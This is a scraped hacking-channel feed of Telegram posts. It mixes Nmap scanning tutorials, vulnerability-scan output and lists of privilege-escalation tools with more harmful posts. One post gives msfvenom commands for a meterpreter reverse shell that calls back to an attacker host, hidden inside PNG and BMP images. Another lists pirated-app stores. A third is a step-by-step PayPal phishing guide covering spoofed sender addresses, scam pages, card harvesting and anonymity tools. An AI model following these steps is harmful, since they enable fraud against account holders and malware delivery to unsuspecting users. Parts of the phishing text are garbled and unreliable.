UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.5K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘2020 BUG HUNTING :


Basics
Setup
Tools
Labs & Testing Environments
Vulnerability Types
Mobile Hacking
Smart Contracts
Coding & Scripting
Hardware & IoT
Blog posts & Talks
Media Resources
Certifications
Mindset & Mental Health

FREE NOW : https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘FREE LEAKS & VULN SEARCH ENGINES:

https://leakix.net/

http://punkspider.org/

https://code.google.com/p/skipfish/

http://www.arachni-scanner.com/

http://wapiti.sourceforge.net/

https://www.rapid7.com/products/nexpose/

https://subgraph.com/vega/index.en.html

https://ivre.rocks/

shodan.io

enjoy
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘NMAP COMMANDS LEARN :


1) Basic Nmap Scan against IP or host
nmap 1.1.1.1

Now, if you want to scan a hostname, simply replace the IP for the host, as you see below:

nmap cloudflare.com

These kinds of basic scans are perfect for your first steps when starting with Nmap.

2. Scan specific ports or scan entire port ranges on a local or remote server
nmap -p 1-65535 localhost

In this example, we scanned all 65535 ports for our localhost computer.

Nmap is able to scan all possible ports, but you can also scan specific ports, which will report faster results. See below:

nmap -p 80,443 8.8.8.8

3. Scan multiple IP addresses
Let’s try to scan multiple IP addresses. For this you need to use this syntax:

nmap 1.1.1.1 8.8.8.8

You can also scan consecutive IP addresses:

nmap -p 1.1.1.1,2,3,4

This will scan 1.1.1.1, 1.1.1.2, 1.1.1.3 and 1.1.1.4.

4. Scan IP ranges
You can also use Nmap to scan entire CIDR IP ranges, for example:

nmap -p 8.8.8.0/28

This will scan 14 consecutive IP ranges, from 8.8.8.1 to 8.8.8.14.

An alternative is to simply use this kind of range:

nmap 8.8.8.1-14

You can even use wildcards to scan the entire C class IP range, for example:

nmap 8.8.8.*

This will scan 256 IP addresses from 8.8.8.1 to 8.8.8.256.

If you ever need to exclude certain IPs from the IP range scan, you can use the β€œβ€“exclude” option, as you see below:

nmap -p 8.8.8.* --exclude 8.8.8.1

5. Scan the most popular ports
Using β€œβ€“top-ports” parameter along with a specific number lets you scan the top X most common ports for that host, as we can see:

nmap --top-ports 20 192.168.1.106

Replace β€œ20” with the desired number. Output example:

[root@securitytrails:~]nmap --top-ports 20 localhost
Starting Nmap 6.40 ( http://nmap.org ) at 2018-10-01 10:02 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000016s latency).
Other addresses for localhost (not scanned): 127.0.0.1
PORT STATE SERVICE
21/tcp closed ftp
22/tcp closed ssh
23/tcp closed telnet
25/tcp closed smtp
53/tcp closed domain
80/tcp filtered http
110/tcp closed pop3
111/tcp closed rpcbind
135/tcp closed msrpc
139/tcp closed netbios-ssn
143/tcp closed imap
443/tcp filtered https
445/tcp closed microsoft-ds
993/tcp closed imaps
995/tcp closed pop3s
1723/tcp closed pptp
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
5900/tcp closed vnc
8080/tcp closed http-proxy
6. Scan hosts and IP addresses reading from a text file
In this case, Nmap is also useful to read files that contain hosts and IPs inside.

Let’s suppose you create a list.txt file that contains these lines inside:

192.168.1.106
cloudflare.com
microsoft.com
securitytrails.com
The β€œ-iL” parameter lets you read from that file, and scan all those hosts for you:

nmap -iL list.txt

7. Save your Nmap scan results to a file
On the other hand, in the following example we will not be reading from a file, but exporting/saving our results into a text file:

nmap -oN output.txt securitytrails.com

Nmap has the ability to export files into XML format as well, see the next example:

nmap -oX output.xml securitytrails.com

8. Disabling DNS name resolution
If you need to speed up your scans a little bit, you can always choose to disable reverse DNS resolution for all your scans. Just add the β€œ-n” parameter

source wiki
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘CVE detection using Nmap :

1) One of Nmap’s greatest features that not all the network and systems administrators know about is something called β€œNmap Scripting Engine” (known as NSE). This scripting engine allows users to use a pre-defined set of scripts, or write their own using Lua programming language.

2) Using NSE is crucial in order to automate system and vulnerability scans. For example, if you want to run a full vulnerability test against your target, you can use these parameters:

nmap -Pn --script vuln 192.168.1.105

πŸ¦‘Output example:

[root@securitytrails:~]nmap -Pn --script vuln 192.168.1.105
Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-01 09:46 -03
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.105
Host is up (0.00032s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
1900/tcp open upnp
20005/tcp open btx
49152/tcp open unknown
49153/tcp open unknown
As you can see, in this vulnerability test we were able to detect one CVE (Slowloris DOS attack).


don't copy our tutorials
unix forum
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Support & Share us β€οΈπŸ‘πŸ»

T.me/UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘SOME GOOD EXPLOITS TOOLS UPLOADED TO GITHUB AFTER LEAK SOURCE CODE :

LinEnum | Scripted Local Linux Enumeration & Privilege Escalation Checks

CVE-2017-5123 | Linux Kernel 4.14.0-rc4+ - 'waitid()'
Local Privilege Escalation

Oracle Privilege Escalation via Deserialization

| CVE-2018-3004 Oracle Privilege Escalation via Deserialization

linux-exploit-suggester | The tool is meant to assist the security analyst in his testing for privilege escalation opportunities on Linux machine

BeRoot Project | BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Best cracked stores for mod apk list 5 :

https://blackmart.xyz/apk/

https://www.revdl.com/category/apps/

https://rexdl.com/

https://apkpure.com/

https://apk4free.net/

https://ihackedit.com/

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Warning! New unpatched Bug in monero wallets.
#Vulnerabilities
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘IMAGE PAYLOAD- HACK WINDOWS-ANDROID :

F E A T U R E S ::

Bypassing CSP using polyglot JPEGs

Hacking group using Polyglot images to hide malvertising attacks

Encoding Web Shells in PNG IDAT chunks

An XSS on Facebook via PNGs & Wonky Content Types

Revisiting XSS payloads in PNG IDAT chunks

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) git clone https://github.com/chinarulezzz/pixload.git

2) cd pixload

3) If you want to inject a metasploit payload, try something like this:

msfvenom -p php/meterpreter_reverse_tcp \
LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php

4) # Edit payload.php if need.

5) ./pixload/png.pl -payload "$(cat payload.php)" -output payload.png

6) ./bmp.pl [-payload 'STRING'] -output payload.bmp

If the output file exists, then the payload will be injected into the
existing file. Else the new one will be created.
Example

7) ./bmp.pl -output payload.bmp

[>| BMP Payload Creator/Injector |<]

https://github.com/chinarulezzz/pixload


[>] Generating output file
[βœ”οΈ] File saved to: payload.bmp

[>] Injecting payload into payload.bmp
[βœ”οΈ] Payload was injected successfully

payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1

00000000 42 4d 2f 2a 00 00 00 00 00 00 1a 00 00 00 0c 00 |BM/*............|
00000010 00 00 01 00 01 00 01 00 18 00 00 00 ff 00 2a 2f |..............*/|
00000020 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d 2f |=1;<script src=/|
00000030 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 63 72 69 70 |/nji.xyz></scrip|
00000040 74 3e 3b |t>;|
00000043

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Do you know that your computer is infected with malware?

Symptom 1: Infected with ransomware

This is the most obvious symptom. The ransomware developer needs to clearly tell the target user that they are infected with the ransomware, otherwise how can they make money? If you are unfortunately the target user, then your computer should pop up a Warning box and tell you that your files are all encrypted and you need to pay a ransom for your data to an account before a certain deadline, otherwise you can say goodbye to your files directly.

Symptom 2: Browser redirection

When you use Google to search for the topic "My computer started to exhibit all kinds of strange behaviors", you clicked on a webpage that seemed to meet your search requirements, but the link opened to another webpage. Your first reaction is of course to go back to the Google search results just now, and then try to access other links. But it didn't help much, what happened just now happened again. You find that every link you click is redirected to other websites. If this happens, then congratulations, you are infected with malware.

Symptom 3: The homepage is tampered with

For example, you set your favorite sports news website as the homepage, but don't know why, every time you open your browser, the homepage of Yahoo.com will always pop up. And you also find that there are many new widget icons in the browser window, and these icons can't be deleted. Then please be careful, you are probably infected with malware.

Symptom 4: Pop-up window full of screen

The so-called pop-up window full of screen means that after you close this window, another window pops up again. And when you are not connected to the Internet, your system will continue to pop up various notification windows. Of course, there are many websites that will pop up various advertisements, and these websites will make you feel very disgusted. If all kinds of inexplicable pop-up messages always appear on your screen, then you may have been infected by malicious ads or spyware.


Symptom 5: The computer is running slower and slower

In fact, there are many factors that cause computers to run slower and slower. It may be because you are running too many programs, or you may not have enough storage space on your hard drive. Of course, it may also be because the memory is too small. If for you, none of the above three reasons are true, and your computer is still very slow, then you have probably been recruited.

Don't copy our tutrials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How To Spam Paypal

First you need :

1) Mailist
2) Hosting ( Cpanel or Shell )
3) Mailler
4) A good Scam page
5) Email To Receive the Result Spam
6) A Letter

πŸ¦‘I will explain all of this to you now.
To start spamming, you need to get a mail list (email list).

Where are you sent your spam) Understanding?

Scam Page means a planned website that looks like

Website of Paypal or website of a bank .... , this list of Fraud

You would need to upload it to the hosting scheme and submit it

To get the results from the mail list,

It's the spot you'll upload your skam to

Page to apply it, but now how do I get

This is not very complex, but you need a sum.

Time (you need to hack the website ...) to get it.

Helping you get started
mean the tools needed to send the spam

It is really easy to use it for the mailer, these tools

Enabling you to deliver a letter with the knowledge

You like it (thread title email from the sender ...)

And to encourage you to send spam to one million emails

I'll show you in the next thread with just one press,

Its The letter who you wil send it to the

mailist ,for example if you will spam Paypal account

you need a letter for paypal, this letter is programmed

and it like the original letter of paypal or bank company ..

( Hello , You need To confirm Your paypal Account .... )

you will use it and place it in the spam page

To get your result of spam in your email

That All Now i will explain you The Setup

1) First We need to Get a mailist ( i will show you in the next Post )
then we need a mailler and hosting and we start ,

2) You need to import and put the spam page in the Hosting area.
In order to receive the spam result, your own email in it, then
In the hosting area, you need to upload the mailler script

And now you need to change the sum of things in the letter.

To add your link to your uploaded spam list, you need to

Sending it

3) Here We start spam page and mailler uploaded
in the hosting letter modified with ower informatin ,
Now go to the mailler link and put the mailist and the letter
and the information of sender ( if you will spam paypal account )
you must pute service@paypal.com like email sender
the title of letter is you need to confirm your account .... ) and you start to send spam to the hacked mailist
now you need just to wait to receive the spam result

4) when they access to the scam page and write there information (
credit card ..... ) you will receive it in your own email

Please use all the tools while doing this. Absence of any one toll can either reveal your location or identity or either the paypal spamming will be useless to do and it wont work.

πŸ¦‘Take care of all the security precautions like:-
RDP
VPN
PROXY
SOCKS5 / 911
etc. to keep yourself anonymous while doing all this.

use for learn only!!
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁